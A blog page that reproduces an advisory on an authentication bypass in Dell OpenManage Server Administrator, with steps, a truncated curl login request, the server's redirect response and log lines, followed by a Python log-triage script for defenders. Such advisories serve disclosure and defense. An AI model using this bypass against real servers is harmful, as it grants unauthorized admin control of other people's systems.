speedose.blogg.se

Openmanage dell





When the OpenManage Server Administrator (OMSA) Web Server and Remote Enablement components are installed on a Dell EMC device and the Managed System Login feature is enabled (disabled by default in v9.5.0), an unauthenticated remote attacker can log in to OMSA as admin without knowing a correct OS username and password on that system.

When the Managed System Login feature is enabled, the OMSA web server presents a Managed System Login page. In this case, the web server can be used to connect to a remote node/system. It takes the IP/hostname of the remote node, a username and the password and makes an HTTPS WS-Management (i.e., WinRM) connection to the Remote Enablement component on the remote node in order to log in to and manage the node. If the IP/hostname of the remote node is set to localhost, the web server makes a WS-Management connection to the Remote Enablement component on the same host on which the web server is running. It's been observed that any user name and password would work.

To perform the authentication bypass, the attacker does the following:

- Switch to the Manage System Login page (by clicking on the Manage Remote Node link).
- Use localhost in the Hostname / IP address field.
- Specify any username (i.e., AAAA) in the Username field.
- Specify any password (i.e., BBBB) in the Password field.
- Check the "Ignore certificate warnings" check box.

The following CURL command shows a successful OMSA login without knowing a correct username and password, as the response is an HTTP redirect to OMSAStart as opposed to a login page (i.e., omalogin.html).

curl -ki -d 'manuallogin=true&targetmachine=localhost&user=AAAA&password=BBBB&application=omsa&ignorecertificate=1' '
HTTP/1.1 302
Strict-Transport-Security: max-age=31536000
Location: /4A6A8DFC482BD64D/OMSAStart?mode=omsa&vid=4A6A8DFC482BD64D

And the log shows more details about the successful authentication bypass login:

22:21:48.463 loginUser.OMAHttpServlet, sUserName=AAAA
22:21:48.463 CharConverter, added charset while getting bytestream UTF-8
22:21:48.479 value of on mean AD auth, slocalLogin=null
22:21:48.479 true for login via login page, sManualLogin=true
22:21:48.479 HttpServlet: login user:value of ignorecertificate=true
22:21:48.479 HttpServlet: login user:value of hostname=localhost
22:21:48.495 HttpServlet: login user: Port is not passed - IPV4 Taking default
22:21:48.495 HttpServlet: EnableDWS pref setting is=true
22:21:48.620 OMAHttpServlet.loginUser: sending parameters to getuserrightsonly, domain= user=AAAA program=omsa localLogin=TRUE computerName=localhost DWS=Research
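For defenders, the log excerpt on this page can be turned into a triage check that flags manual Managed System Login attempts aimed at the web server's own host. This is an added example, not code from the original page or from Dell; the function names, the extra loopback spellings and the rule that each sUserName= line opens a new attempt are assumptions, and the second attempt in the sample is constructed.

```python
import re

# Assumption: the servlet log keeps the "HH:MM:SS.mmm message" layout seen in the excerpt.
LINE = re.compile(r"^(\d{2}:\d{2}:\d{2}\.\d{3})\s+(.*)$")
FIELDS = {
    "user": re.compile(r"sUserName=(\S+)"),
    "manual": re.compile(r"sManualLogin=(\w+)"),
    "ignorecert": re.compile(r"value of ignorecertificate=(\w+)"),
    "host": re.compile(r"value of hostname=(\S+)"),
}
# Assumption: other loopback spellings are treated like the page's "localhost".
LOOPBACK = {"localhost", "127.0.0.1", "::1"}

def parse_attempts(lines):
    """Group log lines into login attempts; each sUserName= line opens a new attempt."""
    attempts, cur = [], None
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue
        ts, msg = m.groups()
        if "sUserName=" in msg:
            cur = {"time": ts}
            attempts.append(cur)
        if cur is None:
            continue  # lines before the first attempt carry no context
        for key, rx in FIELDS.items():
            hit = rx.search(msg)
            if hit:
                cur[key] = hit.group(1)
    return attempts

def triage(lines):
    """Return manual Managed System Login attempts whose target is the web server's own host."""
    return [a for a in parse_attempts(lines)
            if a.get("manual", "").lower() == "true"
            and a.get("host", "").lower() in LOOPBACK]

SAMPLE = [  # first attempt: lines from the page's excerpt; second: constructed remote-node login
    "22:21:48.463 loginUser.OMAHttpServlet, sUserName=AAAA",
    "22:21:48.479 true for login via login page, sManualLogin=true",
    "22:21:48.479 HttpServlet: login user:value of ignorecertificate=true",
    "22:21:48.479 HttpServlet: login user:value of hostname=localhost",
    "09:10:02.100 loginUser.OMAHttpServlet, sUserName=opsadmin",
    "09:10:02.110 true for login via login page, sManualLogin=true",
    "09:10:02.110 HttpServlet: login user:value of ignorecertificate=false",
    "09:10:02.110 HttpServlet: login user:value of hostname=10.0.0.5",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print("review:", hit)
```

Concurrent logins can interleave their lines in a real log, so treat a hit as a prompt to review the surrounding entries, not as proof on its own.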





